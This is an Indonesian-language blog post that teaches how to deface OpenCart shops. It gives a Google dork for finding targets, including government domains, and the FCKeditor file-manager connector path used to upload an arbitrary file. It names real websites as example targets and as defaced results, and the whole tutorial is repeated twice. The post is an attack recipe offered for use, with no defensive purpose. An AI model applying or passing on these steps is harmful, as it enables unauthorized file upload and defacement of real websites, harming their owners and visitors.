ALJINET BUMIAYU - LANGSUNG AJA!!!
dork :Powered By OpenCart site:com ( untuk site: bisa di ganti dengan my , il .gov dll. yang penting supportdi opencart :D) kalo pengin semuanya pake ini aja Powered By OpenCart,copy paste kan aja di search google.
contoh target : site- http://www.xuhongmrw.com/
bisa juga dgn trget www.target.com/pacth/ itu kalo dpt trget yg ad di /patch/ nyaex: http://www.target.com/patch/
nah kalo dh dpt trget, lngsung aj kita inject exploitnya
for exploit :
Quote:
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
for exploit :
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
jadi nya gini bro :
ex: http://www.superbikecarbonparts.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/ test.html
kalau target yang ada /patch/ , inject nya di belakang patch nya
ex: www.target.com/patch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
Jika berhasil akan keluar semacam peringatan seperti ini :
"file uploaded with no errors"
kita tinggal cek aja di
"Get Folders and Files" apakah sudah terupload apa belum :D
untuk mengceknya kita tinggal ketik aja nama file deface kita misal punya saja aljinet.html
tinggal ketik aja di belakang target tadi,jadi seperti ini
http://www.superbikecarbonparts.com/aljinet.html.
oya hampir saja lupa ganti Connector:ASP jadi PHP ya kawan.
contoh hasil :
http://www.superbikecarbonparts.com/aljinet.html
dork :Powered By OpenCart site:com ( untuk site: bisa di ganti dengan my , il .gov dll. yang penting supportdi opencart :D) kalo pengin semuanya pake ini aja Powered By OpenCart,copy paste kan aja di search google.
contoh target : site- http://www.xuhongmrw.com/
bisa juga dgn trget www.target.com/pacth/ itu kalo dpt trget yg ad di /patch/ nyaex: http://www.target.com/patch/
nah kalo dh dpt trget, lngsung aj kita inject exploitnya
for exploit :
Quote:
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
for exploit :
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
jadi nya gini bro :
ex: http://www.superbikecarbonparts.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/
kalau target yang ada /patch/ , inject nya di belakang patch nya
ex: www.target.com/patch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
Jika berhasil akan keluar semacam peringatan seperti ini :
"file uploaded with no errors"
kita tinggal cek aja di
"Get Folders and Files" apakah sudah terupload apa belum :D
untuk mengceknya kita tinggal ketik aja nama file deface kita misal punya saja aljinet.html
tinggal ketik aja di belakang target tadi,jadi seperti ini
http://www.superbikecarbonparts.com/aljinet.html.
oya hampir saja lupa ganti Connector:ASP jadi PHP ya kawan.
contoh hasil :
http://www.superbikecarbonparts.com/aljinet.html
0 komentar:
Posting Komentar
pembaca yang baik selalu,memberi comentar yang baik pula,buat artikel aljinet ini,biar ada masukan lebih dan memgembangkan blog aljinet ini,untuk itu disarankan comentlah artikel kami,beri kritikan yang pedas tidak masalah,silakan di coment kawan